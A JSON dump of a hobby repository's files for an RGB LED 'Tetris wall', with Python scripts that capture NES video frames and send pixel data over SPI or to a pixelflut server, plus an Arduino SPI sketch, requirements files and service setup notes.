next_gen(f)\n time.sleep(.2)\n\n" }, { "alpha_fraction": 0.704119861125946, "alphanum_fraction": 0.7465667724609375, "avg_line_length": 20.675676345825195, "blob_id": "be8fedb6e84f53998a67970ec0606becdac7ed9e", "content_id": "dc8776cf250a327c4c23c0d4a8f481dde73f7558", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 801, "license_type": "no_license", "max_line_length": 82, "num_lines": 37, "path": "/readme.md", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "== Synopsis: ==\n\n\n== Hardware: ==\n\n- WS2811 5050 LED strips (60leds/m, 20ics/m)\n- 12V power supply (HP 750W HSTNS-PL18), provides 62.5A/12V\n- Arduino Mega\n- Raspberry PI 3 B\n- EasyCAP USB grabber with Syntek STK1160 chip set\n- Microphone\n- Switches, Buttons, Photo-resistor, \n\nPhoto-resistor:\n- Measures light for regulating the overall brightness of the leds\n- Basic photo-resistor with voltage divider via 5k1ohm resistor for input pulldown\n\nMicrophone:\n- Measures sound for simple beat detection that can get visualised\n- Basic line-in microphone\n- Microphone amplifier (with poti) Iduino SE019\n\n\n== Software: ==\n\n= Arduino: =\nPurpose:\n\nLibraries (C):\n- https://playground.arduino.cc/Code/ElapsedMillis\n- https://github.com/FastLED/FastLED\n\n= Raspberry PI =\nPurpose:\n\nLibraries (python):\n- pyserial" }, { "alpha_fraction": 0.4040403962135315, "alphanum_fraction": 0.6767676472663879, "avg_line_length": 13.285714149475098, "blob_id": "ac3b86628b68952a3f6fcecaf2c8e542879a1c86", "content_id": "74a4877336e9b77757ac5a077d4100ff0b2f3a8c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 99, "license_type": "no_license", "max_line_length": 19, "num_lines": 7, "path": "/raspi_preproc/requirements.txt", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "gevent==1.3.6\nnumpy==1.15.2\nPillow==5.1.0\npygame==1.9.4\nPyV4L2Camera==0.1a2\npyv4l2==1.0.2\nv4l2==0.2" }, { "alpha_fraction": 0.6133610010147095, "alphanum_fraction": 0.6368985772132874, "avg_line_length": 25.504587173461914, "blob_id": "28e5d4ea978d9322635fb60d697580d603d09fb9", "content_id": "e2b2be93c581118ec67a200194ee775a0a62fb5d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2889, "license_type": "no_license", "max_line_length": 77, "num_lines": 109, "path": "/raspi_preproc/workbench/streaming/stream.py", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "import os\nimport argparse\nimport numpy as np\nfrom time import sleep\nfrom time import time\n\nfrom pyv4l2.frame import Frame\nfrom pyv4l2.control import Control\n\nfrom lib.encoding import UYVY_RAW2RGB_PIL\nfrom lib.visualization import send_visdom\nfrom lib.cropping import extract_single_player_area\nfrom lib.cropping import extract_colours\n\nimport pigpio\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument('--width', type=int, default=720)\nparser.add_argument('--height', type=int, default=576)\nparser.add_argument('--scale', type=float, default=1.)\nparser.add_argument('--visdom-server', type=str, default='http://localhost')\nparser.add_argument('--visdom', action='store_true')\nparser.add_argument('--device', type=str, default='/dev/video0')\n\nargs = parser.parse_args()\n\nw = int(args.width // args.scale)\nh = int(args.height // args.scale)\n\nos.system('v4l2-ctl -d {device} --set-fmt-video width={w},height={h}'.format(\n device=args.device, w=w, h=h))\n\nframe = Frame(args.device)\n\nif args.visdom:\n import visdom\n vis = visdom.Visdom(server=args.visdom_server)\n\npi = pigpio.pi()\nif not pi.connected:\n print(\"could not connect spi\")\n exit()\nspi = pi.spi_open(0, 750000, 0)\nSYNC_PIN = 24\npi.set_mode(SYNC_PIN, pigpio.INPUT)\n\nNUM_LEDS_H = 16\nNUM_LEDS_V = 24\n\nleds = np.zeros((NUM_LEDS_H, NUM_LEDS_V, 3), dtype='uint8')\n\ndef send_spi(colours):\n colours = colours.convert('HSV')\n print(colours)\n for x in range(colours.width):\n for y in range(colours.height):\n px = colours.getpixel((x, y))\n leds[x, colours.height - y - 1] = px\n data_dec = leds.transpose(1, 0, 2).flatten().tobytes()\n # wait for spi\n print(\"waiting for spi\")\n wait = True\n print(\"debug -\", \"pi.read_bank_1:\", pi.read_bank_1())\n while wait:\n v = (pi.read_bank_1() >> SYNC_PIN) & 1\n if v == 1:\n wait = False\n print(\"debug -\", \"pi.read_bank_1:\", pi.read_bank_1())\n pi.spi_write(spi, data_dec)\n\ndef send_pi(img):\n x_tl = 270/720 * img.width\n y_tl = 152/576 * img.height\n x_br = 475/720 * img.width\n y_br = 474/576 * img.height\n rect = (x_tl, y_tl, x_br, y_br)\n\n area = extract_single_player_area(img, rect)\n\n if args.visdom:\n send_visdom(vis, area.convert('RGBA'), win='crop img')\n\n colours = extract_colours(area)\n send_spi(colours)\n\n if args.visdom:\n send_visdom(vis, colours.convert('RGBA'), win='crop color img')\n\nwhile True:\n time_in = time()\n frame_data = frame.get_frame()\n\n data = np.array(list(frame_data), dtype='uint8')\n time_cap = time()\n\n img = UYVY_RAW2RGB_PIL(data, w, h)\n\n #import pdb; pdb.set_trace()\n\n if args.visdom:\n send_visdom(vis, img.convert('RGBA'), win='cap img')\n\n send_pi(img)\n\n time_out = time()\n\n print('sent image, time image: {}, time cap: {}'.format(\n (time_out - time_in), (time_cap - time_in)))\n" }, { "alpha_fraction": 0.5617936849594116, "alphanum_fraction": 0.5822092890739441, "avg_line_length": 29.82022476196289, "blob_id": "fa7bd4014d24da5133227178335883ef838f7667", "content_id": "e65258fd9cb2a81b90b589ccf8b346a5f2ab2163", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2743, "license_type": "no_license", "max_line_length": 75, "num_lines": 89, "path": "/reels/fluter/__init__.py", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "\"\"\"\nModule for sending to deep pixelflut server.\n\nSimple functions to send to a pixelflut server from a python script.\nHandles connecting to the server on its own (but does never disconnect).\nIn addition to setting individual pixels it supports a command \"WL\" to\nsend a complete picture to our LED-Tetris-Wall.\n\nTo specify host/port of target server, set environment variable\nPIXELFLUT_HOST to \"hostname\" or to \"hostname:port\".\n\nCreated by deep cyber -- the deepest of all cybers.\n\"\"\"\n\nimport socket\nimport base64\nimport numpy as np\nimport os\n\n\nclass Fluter:\n DEFAULT_HOST = None\n\n def __init__(self, host=DEFAULT_HOST, width=16, height=24, depth=3):\n self.host, self.port = self._parse_host(host)\n self.width = width\n self.height = height\n self.depth = depth\n self.socket = None\n\n def _parse_host(self, host):\n if host is Fluter.DEFAULT_HOST:\n host = os.environ.get(\"PIXELFLUT_HOST\", \"localhost:1234\")\n parts = host.split(\":\")\n if len(parts) == 2:\n return parts[0], int(parts[1])\n else:\n return parts[0], 1234\n\n def _connect(self):\n # TODO: add a reconnect mechanic\n if not self.socket:\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.socket.connect((self.host, self.port))\n\n def send_pixel(self, pos, colour):\n \"\"\"\n Set a single pixel on pixelflut server. Connects on demand.\n :param pos: (x, y) -- position of pixel to set\n :param colour: (r, g, b) or (r, g, b, a) -- colour to set pixel to\n :return:\n \"\"\"\n assert len(pos) == 2\n assert 3 <= len(colour) <= 4\n self._connect()\n args = tuple(pos) + tuple(colour)\n if len(colour) == 3:\n self.socket.send(b\"PX %d %d %02x%02x%02x\\n\" % args)\n else:\n self.socket.send(b\"PX %d %d %02x%02x%02x%02x\\n\" % args)\n\n def send_raw(self, data):\n \"\"\"\n Send 16x24 raw image data (RGB, uint8) to server.\n :param data:\n :return:\n \"\"\"\n assert len(data) == self.width * self.height * self.depth\n self._connect()\n encoded = base64.b64encode(data)\n self.socket.send(b\"WL \" + encoded + b\"\\n\")\n\n def send_image(self, image):\n \"\"\"\n Send image to server (scales to 16x24).\n :param image:\n :return:\n \"\"\"\n image = image.resize((self.width, self.height)).convert(\"RGB\")\n self.send_raw(image.tobytes())\n\n def send_array(self, arr):\n \"\"\"\n Send array data to server. Must have 16*24*3 uint8 values.\n :param arr:\n :return:\n \"\"\"\n flat = np.array(arr).flatten()\n self.send_raw(flat)\n" }, { "alpha_fraction": 0.7599999904632568, "alphanum_fraction": 0.8399999737739563, "avg_line_length": 5.25, "blob_id": "93113b190a6c5055a9586446a29f1cb8699879dc", "content_id": "df9ec763ecea40f435545608ce28297ff80f8f3d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 25, "license_type": "no_license", "max_line_length": 6, "num_lines": 4, "path": "/raspi_preproc/workbench/streaming/requirements.txt", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "Pillow\npyv4l2\nsix\nvisdom\n" }, { "alpha_fraction": 0.5584415793418884, "alphanum_fraction": 0.600649356842041, "avg_line_length": 43, "blob_id": "e3fc6991c6ed60a86e9a4a893d8e8c01956ba7c3", "content_id": "18d5dd1f9f11fce7c4fa0a598d5f559675fa8d15", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 308, "license_type": "no_license", "max_line_length": 79, "num_lines": 7, "path": "/raspi_preproc/workbench/streaming/lib/encoding.py", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "from PIL import Image\n\ndef UYVY_RAW2RGB_PIL(data, w, h):\n y=Image.frombytes('L',(w,h),data[1::2].copy())\n u=Image.frombytes('L',(w,h),data[0::4].reshape(w//2,h).copy().repeat(2, 0))\n v=Image.frombytes('L',(w,h),data[2::4].reshape(w//2,h).copy().repeat(2, 0))\n return Image.merge('YCbCr',(y,u,v))\n" }, { "alpha_fraction": 0.5366550087928772, "alphanum_fraction": 0.5602698922157288, "avg_line_length": 33.2400016784668, "blob_id": "e7605bfe2926d84ae0385fd958ab71e90a513373", "content_id": "50a278131f98c057277cc2f8a5a4ee56877326d5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7707, "license_type": "no_license", "max_line_length": 116, "num_lines": 225, "path": "/raspi_preproc/stream_nes.py", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "import os\nimport base64\nimport numpy as np\n#from pyv4l2.frame import Frame\nfrom PyV4L2Camera.camera import Camera\nfrom PIL import Image\nfrom PIL import ImageFilter\nfrom nes_tetris import NesTetris\n\n\n\"\"\" Computational costs on raspi:\n- grab the frame: 13-17 ms\n- convert frame to RGB PIL img: 5 - 6 ms\n- cut game area: 2-3 ms\n- calculate led pixels from cutted rgb img (including smooth filters): 19 - 27 ms\noverall costs: 40-52 ms\n\"\"\"\n\nclass StreamNES:\n # -s, --set - standard = < num >\n # pal or pal - X(X=B / G / H / N / Nc / I / D / K / M / 60)(V4L2_STD_PAL)\n # ntsc or ntsc - X(X=M / J / K)(V4L2_STD_NTSC)\n # secam or secam - X(X=B / G / H / D / K / L / Lc)(V4L2_STD_SECAM)\n\n def __init__(self, _num_leds_h=16, _num_leds_v=24, _ntsc=True, feedback=False):\n self.num_leds_h = _num_leds_h\n self.num_leds_v = _num_leds_v\n self.ntsc = _ntsc\n self.leds = np.zeros((_num_leds_v, _num_leds_h, 3)) #should be not necessary\n self.b64dict = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'\n if self.ntsc:\n self.mode = 'NTSC'\n self.fps = 30\n self.width = 720\n self.height = 480\n else:\n self.mode = 'PAL-B'\n self.fps = 25\n self.width = 720\n self.height = 576\n self.format = 'UYVY'\n self.b = 3 # 3 2\n #self.color = '' #''smpte170'\n if (feedback):\n fb = 'verbose'\n else:\n fb = 'silent'\n\n self.scale = 1.\n self.device = '/dev/video0'\n self.w = int(self.width // self.scale)\n self.h = int(self.height // self.scale)\n\n self.game = NesTetris(_num_leds_h=_num_leds_h, _num_leds_v=_num_leds_v)\n\n #-p 25\n os.system(\n 'v4l2-ctl -d {device} -s {m} --set-fmt-video width={w},height={h},pixelformat={pf} --{fb}'.format(\n #'v4l2-ctl -d {device} -p {fps} -s {m} --set-fmt-video width={w},height={h},pixelformat={pf} --{fb}'.format(\n device=self.device, fps=self.fps, m=self.mode, w=self.w, h=self.h, pf=self.format, fb=fb))\n #self.frame = Frame(self.device)\n self.frame = Camera(self.device)\n\n def Frame_UYVY2YCbCr_PIL(self, w, h, frame_data):\n data = np.fromstring(frame_data, dtype='uint8')\n y = Image.frombytes('L', (w, h), data[1::2].copy())\n u = Image.frombytes('L', (w, h), data[0::4].copy().repeat(2, 0))\n v = Image.frombytes('L', (w, h), data[2::4].copy().repeat(2, 0))\n return Image.merge('YCbCr', (y, u, v))\n\n def read_frame_dec(self):\n self.leds = self.read_frame()\n #TODO convert to 64 color palette, thus the remainder does not work\n data_b64 = ''.join(self.b64dict[m] for n in self.leds for m in n)\n data_dec = base64.b64decode(data_b64)\n\n return data_dec\n\n def read_frame(self):\n\n #get a frame from the device\n #frame_data = self.frame.get_frame()\n while True:\n frame_data = self.frame.get_frame()\n if len(frame_data) == self.w * self.h * self.b:\n break\n\n #img = self.Frame_UYVY2YCbCr_PIL(self.w, self.h, frame_data)\n img = Image.frombytes('RGB', (self.w, self.h), frame_data, 'raw', 'RGB')\n\n #cut the frame to game size (depending on game) ane transform it for the leds\n #img_game = self.game.extract_game_area(img).filter(ImageFilter.SMOOTH).convert(\"HSV\")\n img_game = self.game.extract_game_area(img, ntsc=self.ntsc)\n img_leds = self.game.transform_frame(img_game)\n #img to array conversion\n self.leds = np.array(img_leds)\n\n #debug:\n #self.leds = img_leds\n #img_game.convert(\"RGB\").save(\"nes_cut.png\", \"PNG\")\n #img_leds.convert(\"RGB\").save(\"leds.png\", \"PNG\")\n\n return self.leds\n\n\n # for debug:\n def read_frame0(self):\n frame_data = self.frame.get_frame()\n return frame_data\n def read_frame1(self):\n #frame_data = self.frame.get_frame()\n while True:\n frame_data = self.frame.get_frame()\n if len(frame_data) == self.w * self.h * self.b:\n break\n else:\n print(\"debug - \", \"frame not correct\", \"frame_data_len:\",\n len(frame_data))\n return frame_data\n def read_frame2(self, frame_data):\n #img = self.Frame_UYVY2YCbCr_PIL(self.w, self.h, frame_data)\n img = Image.frombytes('RGB', (self.w, self.h), frame_data, 'raw', 'RGB')\n return img\n def read_frame3(self, img):\n #img_game = self.game.extract_game_area(img).filter(ImageFilter.SMOOTH).convert(\"HSV\")\n img_game = self.game.extract_game_area(img, ntsc=self.ntsc)\n return img_game\n def read_frame4(self, img_game):\n img_leds = self.game.transform_frame(img_game)\n self.leds = img_leds\n return self.leds\n # end for debug\n\n\n#for debug\nimport time\nimport datetime\n#import visdom\nfrom six import BytesIO\nimport base64 as b64\n\ndef send_visdom(vis, im, win=None, env=None, opts=None):\n opts = {} if opts is None else opts\n\n opts['height'] = opts.get('height', im.height)\n opts['width'] = opts.get('width', im.width)\n\n buf = BytesIO()\n im.save(buf, format='PNG')\n b64encoded = b64.b64encode(buf.getvalue()).decode('utf-8')\n\n data = [{\n 'content': {\n 'src': 'data:image/png;base64,' + b64encoded,\n 'caption': opts.get('caption'),\n },\n 'type': 'image',\n }]\n\n return vis._send({\n 'data': data,\n 'win': win,\n 'eid': env,\n 'opts': opts,\n })\n\nif __name__ == \"__main__\":\n iterations = 250\n is_visdom = False\n # command line:$ python3 -m visdom.server\n WAITTIME_VSTREAM = 1.0 #0.040 # 40 ms\n print(\"Start StreamNES...\")\n stream = StreamNES(feedback=True)\n\n visd_server = 'http://localhost'\n if is_visdom:\n vis = visdom.Visdom(server=visd_server)\n\n print(\"Start reading frames...\")\n for i in range(iterations):\n timestart = datetime.datetime.now()\n\n print(\"read frame...\")\n\n #stream.read_frame()\n #print(\"...done\")\n\n a = stream.read_frame1()\n print(\"...done1\")\n timestart_a = datetime.datetime.now()\n b = stream.read_frame2(a)\n print(\"...done2\")\n timestart_b = datetime.datetime.now()\n c = stream.read_frame3(b)\n print(\"...done3\")\n timestart_c = datetime.datetime.now()\n d = stream.read_frame4(c)\n print(\"...done4\")\n\n timefin = datetime.datetime.now()\n c.convert(\"RGB\").save(\"nes_cut.png\", \"PNG\")\n d.convert(\"RGB\").save(\"leds.png\", \"PNG\")\n if is_visdom:\n send_visdom(vis, c.convert('RGBA'), win='source')\n send_visdom(vis, d.resize((160,240)).convert('RGBA'), win='led-pixel-wall')\n\n waittime = max(0.0,(WAITTIME_VSTREAM)-(0.000001*(timefin-timestart).microseconds))\n\n time_a = timestart_a - timestart\n time_b = timestart_b - timestart_a\n time_c = timestart_c - timestart_b\n time_d = timefin - timestart_c\n time_total = time_a + time_b + time_c + time_d\n print(\"grab_t: {time_a}, conv_t: {time_b}, \"\n \"cut_t: {time_c}, smooth_trans_t: {time_d}, \"\n \"total_t: {time_total}, wait_t: {waittime} in ms\".format(\n time_a=time_a.microseconds / 1000,\n time_b=time_b.microseconds / 1000,\n time_c=time_c.microseconds / 1000,\n time_d=time_d.microseconds / 1000,\n time_total=time_total.microseconds / 1000,\n waittime=waittime * 1000,\n ))\n\n time.sleep(waittime)\n\n\n\n" }, { "alpha_fraction": 0.556917667388916, "alphanum_fraction": 0.6038528680801392, "avg_line_length": 26.190475463867188, "blob_id": "c5da94726fa3057efe2021159312a6b54c221ff2", "content_id": "ae05f470f2ab1679dd6fa55192f097a6af3e96e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2855, "license_type": "no_license", "max_line_length": 91, "num_lines": 105, "path": "/raspi_preproc/workbench/send_spi.py", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "mport serial\nimport time\nimport datetime\nimport base64\nimport pigpio\nimport numpy as np\n\nUSBPORT = '/dev/ttyACM0' #check correct port first\n#USBPORT = 'COM3' #check correct port first\nNUM_LEDS_H = 16 #16\nNUM_LEDS_V = 24 #24\nFPS = 25\nWAITTIME_VSTREAM = 0.040 #40 ms\nWAITTIME_ISTREAM = 1.0 #40 ms\n\nb64dict = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'\n\n\n#s = serial.Serial(USBPORT, 115200) #57600 dc115200 230400\npi = pigpio.pi()\nif not pi.connected:\n print(\"could not connect spi\")\n exit()\n\n#spi = pi.spi_open(0, 115200)\nspi = pi.spi_open(0, 750000, 0)\n\n\ncounter = 0\ndelaycounter = 1\ndelay = 1 #FPS 1 for testing\ndata_read = 0\n\n#gp = pigpio.pi()\nSYNC_PIN = 18 # GPIO pin numbers\npi.set_mode(SYNC_PIN, pigpio.INPUT)\n\nimport PIL.Image\nref_img = PIL.Image.open('../mario.png').convert('HSV')\n#ref_img = PIL.Image.open('d.png').convert('RGB')\n\nfor j in range(NUM_LEDS_V):\n for i in range(NUM_LEDS_H):\n px = ref_img.getpixel((i, j))\n print(1 if sum(px) > 0 else 0, end='')\n print('')\n\nleds = np.zeros((NUM_LEDS_H, NUM_LEDS_V, 3), dtype='uint8')\n\ncnt = 0\nprint(\"Start sending\")\nwhile True:\n timestart_proc = datetime.datetime.now()\n\n for x in range(NUM_LEDS_H):\n for y in range(NUM_LEDS_V):\n #leds[x, y] = 12\n #leds[x, y] = (6*(cnt-x+y) % 64, 4*(cnt-x+y) % 64, 2*(cnt-x+y) % 64)\n px = ref_img.getpixel((x, y))\n leds[x, NUM_LEDS_V - y - 1] = px\n if (delaycounter%delay == 0):\n counter=(counter+1)%NUM_LEDS_H\n delaycounter=(delaycounter+1)%delay\n\n data_dec = leds.transpose(1, 0, 2).flatten().tobytes()\n\n timestart_send = datetime.datetime.now()\n\n print(\"sending bytes:\", len(data_dec))\n pi.spi_write(spi, data_dec)\n \n timestart_render = datetime.datetime.now()\n\n wait = True\n\n while wait:\n v = (pi.read_bank_1() >> SYNC_PIN) & 1\n if v == 1:\n wait = False\n else:\n #print(cnt, \"wait for sync\", v)\n pass\n\n cnt += 1\n timefin = datetime.datetime.now()\n waittime = max(0.0,(WAITTIME_VSTREAM)-(0.000001*(timefin-timestart_proc).microseconds))\n \n time_proc = timestart_send - timestart_proc\n time_send = timestart_render - timestart_send\n time_render = timefin - timestart_render\n time_total = time_send + time_render + time_proc\n print(\"time_proc: {time_proc}, time_send: {time_send}, \"\n \"time_render: {time_render}, time_total: {time_total}, \"\n \"wait_t: {waittime}\".format(\n time_proc=time_proc.microseconds / 1000,\n time_send=time_send.microseconds / 1000,\n time_render=time_render.microseconds / 1000,\n time_total=time_total.microseconds / 1000,\n waittime=waittime,\n ))\n\n time.sleep(waittime) \n\npi.spi_close(spi)\npi.stop()\n" }, { "alpha_fraction": 0.5221595764160156, "alphanum_fraction": 0.5487509965896606, "avg_line_length": 13.75, "blob_id": "cf9cf189f5ee9876b0209775b6da793fe258dd9e", "content_id": "231bf64dd1e1031f109f0e5ab9ef9e7f5643fdbe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1241, "license_type": "no_license", "max_line_length": 53, "num_lines": 84, "path": "/arduino_controller/workbench/spi_test/spi_test.ino", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "\n#include <SPI.h>\n\n#define BUFSZ 288\nchar buf [BUFSZ];\nvolatile byte pos;\nvolatile boolean processing;\nint cnt = 0;\nconst int SYNC_PIN = 47;\n\nvoid setup() {\n Serial.begin(115200);\n \n // turn on SPI in slave mode\n SPCR |= bit (SPE);\n\n // have to send on master in, *slave out*\n pinMode(MISO, OUTPUT);\n pinMode(SYNC_PIN, OUTPUT);\n\n // get ready for an interrupt \n pos = 0;\n processing = false;\n\n // now turn on interrupts\n SPI.attachInterrupt();\n \n // give time to set up:\n delay(100);\n}\n\nvolatile bool foo = false;\n\nISR (SPI_STC_vect)\n{\n byte c = SPDR; // grab byte from SPI Data Register\n\n if (processing) {\n return;\n }\n\n digitalWrite(SYNC_PIN, LOW);\n //digitalWrite(13, LOW);\n\n if (c == '\\n') {\n processing = true;\n return;\n }\n\n if (pos < BUFSZ) {\n buf[pos++] = c;\n }\n}\n\n\nvoid loop (void)\n{\n int i, c;\n \n if (processing) {\n /*\n if (!foo) {\n digitalWrite(13, HIGH);\n foo = !foo;\n } else {\n digitalWrite(13, LOW);\n foo = !foo;\n }\n */\n \n buf[pos] = 0;\n if (cnt == 0) {\n Serial.println(pos);\n }\n \n pos = 0;\n cnt = (cnt + 1) % 256;\n\n delay(12);\n digitalWrite(SYNC_PIN, HIGH);\n //digitalWrite(13, HIGH);\n\n processing = false;\n }\n}\n\n" }, { "alpha_fraction": 0.7969151735305786, "alphanum_fraction": 0.7969151735305786, "avg_line_length": 26.785715103149414, "blob_id": "18c8edfa211c8d5c067a88ba2918cd7415f8ed89", "content_id": "b1b5d50f2c94a8dfa842db9e2d994e2cc0296265", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 389, "license_type": "no_license", "max_line_length": 71, "num_lines": 14, "path": "/operation/README.md", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "To install as service, copy the script to the systemd service directory\n\n\tsudo cp rgb-tetris-wall.service /etc/systemd/system\n\nEnable the service and use `service` as you would normally\n\n\tsudo systemctl enable rgb-tetris-wall\n\tsudo service rgb-tetris-wall start\n\nSome shortcuts:\n\n\tsudo service rgb-tetris-wall start\n\tsudo service rgb-tetris-wall stop\n\tsudo service rgb-tetris-wall restart\n" }, { "alpha_fraction": 0.6758620738983154, "alphanum_fraction": 0.6919540166854858, "avg_line_length": 20.75, "blob_id": "02f6e53f6b8aa6aa6894faa8aca44e4402dad6e5", "content_id": "f42ce4fb57fcab277d376b2fc7587f3e54ad686c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 435, "license_type": "no_license", "max_line_length": 82, "num_lines": 20, "path": "/reels/rauschen.py", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "\"\"\"\nRauschen reel.\n\nJust some randomly changing gray values, to emulate random noise on a television.\n\nCreated by kratenko.\n\"\"\"\nimport numpy as np\nimport time\nfrom fluter import Fluter\n\nfluter = Fluter()\n\nwhile True:\n # great gray pixels\n f = np.random.randint(256, size=(fluter.height, fluter.width), dtype=np.uint8)\n # rescale to rgb\n f = np.stack((f,)*fluter.depth, axis=-1)\n fluter.send_array(f)\n time.sleep(.01)\n" }, { "alpha_fraction": 0.5030580759048462, "alphanum_fraction": 0.5259938836097717, "avg_line_length": 23.22222137451172, "blob_id": "715df2e757bfca2e17fd23a5853f8cdbae6eed52", "content_id": "67f38fe9f973baa7cf9ec4573d1eaa84c78649e7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 654, "license_type": "no_license", "max_line_length": 62, "num_lines": 27, "path": "/raspi_preproc/workbench/streaming/lib/visualization.py", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "from six import BytesIO\nimport base64 as b64\n\ndef send_visdom(vis, im, win=None, env=None, opts=None):\n opts = {} if opts is None else opts\n\n opts['height'] = opts.get('height', im.height)\n opts['width'] = opts.get('width', im.width)\n\n buf = BytesIO()\n im.save(buf, format='PNG')\n b64encoded = b64.b64encode(buf.getvalue()).decode('utf-8')\n\n data = [{\n 'content': {\n 'src': 'data:image/png;base64,' + b64encoded,\n 'caption': opts.get('caption'),\n },\n 'type': 'image',\n }]\n\n return vis._send({\n 'data': data,\n 'win': win,\n 'eid': env,\n 'opts': opts,\n })\n" }, { "alpha_fraction": 0.807692289352417, "alphanum_fraction": 0.807692289352417, "avg_line_length": 38.5, "blob_id": "516471cca6c2213e370e21ab299c84bf1093ca2f", "content_id": "8c58e498e050e98fc5ef1ee3c5e2ff6be856d713", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 78, "license_type": "no_license", "max_line_length": 46, "num_lines": 2, "path": "/fluter.py", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "# just wrap fluter module, so pycharm finds it\nfrom reels.fluter import Fluter" }, { "alpha_fraction": 0.48973608016967773, "alphanum_fraction": 0.53665691614151, "avg_line_length": 12.038461685180664, "blob_id": "456b6260e922f887e7dc9d50ddcef4ac4083aa8f", "content_id": "532406848f18e795d7252e359e829d3e0481135a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 341, "license_type": "no_license", "max_line_length": 27, "num_lines": 26, "path": "/raspi_preproc/workbench/s1.py", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "import time\nimport pigpio\n\npi = pigpio.pi()\n\nif not pi.connected:\n print(\"nope\")\n exit(0)\n\nh = pi.spi_open(0, 1152000)\n\n\nn = 0\n\ntry:\n while True:\n n += 1\n s = \"n:%04x\\n\" % n\n pi.spi_xfer(h, s)\n print(s)\n #time.sleep(0.01)\nexcept KeyboardInterrupt:\n print(\"Byebye\")\n\npi.spi_close(h)\npi.stop()\n\n\n" } ]
36
joao-afonso-pereira/Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning
https://github.com/joao-afonso-pereira/Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning
3ecb2f795b63490b76c0427f3262af254dd118ea
5607c3d1f02efa285d04b933b9d1f601903e6535
ec56cadfe20834b9e6536ce075f0d807f509c967
refs/heads/master
2022-12-07T20:53:29.842211
2020-09-02T20:41:23
2020-09-02T20:41:23
284,818,782
1
1
null
null
null
null
null
[ { "alpha_fraction": 0.5160680413246155, "alphanum_fraction": 0.5268701314926147, "avg_line_length": 29.866666793823242, "blob_id": "9bd10bbeb9058a9c89c9c117330e7ce0a6a83e4f", "content_id": "2e44d1ec227dc5a7d829b754a0e52049b35d145f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3703, "license_type": "no_license", "max_line_length": 102, "num_lines": 120, "path": "/MLP/models/mlp_reg_fpad.py", "repo_name": "joao-afonso-pereira/Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning", "src_encoding": "UTF-8", "text": "import math\nimport sys\n\nsys.path.insert(0, '../data/')\nsys.path.insert(0, '../layers/')\nsys.path.insert(0, '../utils/')\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom sklearn.model_selection import ShuffleSplit\nfrom torch import Tensor\nfrom torch.nn import functional as F\n\nfrom mlp_layers import BasicDenseLayer\n\n#from utils import (get_flat_dim, get_convblock_dim, get_deconvblock_padding)\n\nfrom mlp_fpad import MLP_FPAD\n\n\nclass MLP_REG_FPAD(nn.Module):\n def __init__(self,\n num_materials,\n input_dims=275,\n dense_task=[128, 128, 2],\n dense_enc=[128, 128],\n activation='relu',\n bnorm=False,\n dropout=0.0,\n is_classifier=True):\n\n super(MLP_REG_FPAD, self).__init__()\n\n self.input_dims = input_dims\n self.dense_task = dense_task\n self.dense_enc = dense_enc\n self.dense_adv = [128, 128, num_materials]\n self.activation = activation\n self.bnorm = bnorm\n self.dropout = dropout\n self.is_classifier = is_classifier\n\n # Initialize encoder layers\n self.encoder = MLP_FPAD(input_dims=self.input_dims,\n dense_dims=self.dense_enc,\n activation=self.activation,\n bnorm=self.bnorm,\n dropout=self.dropout,\n is_classifier=False)\n\n # Initialize task-classifier layers\n self.task_classifier = MLP_FPAD(input_dims=self.dense_enc[-1],\n dense_dims=self.dense_task,\n activation=self.activation,\n bnorm=self.bnorm,\n dropout=self.dropout,\n is_classifier=True)\n\n # Initialize adv-classifier layers\n self.adv_classifier = MLP_FPAD(input_dims=self.dense_enc[-1],\n dense_dims=self.dense_adv,\n activation=self.activation,\n bnorm=self.bnorm,\n dropout=self.dropout,\n 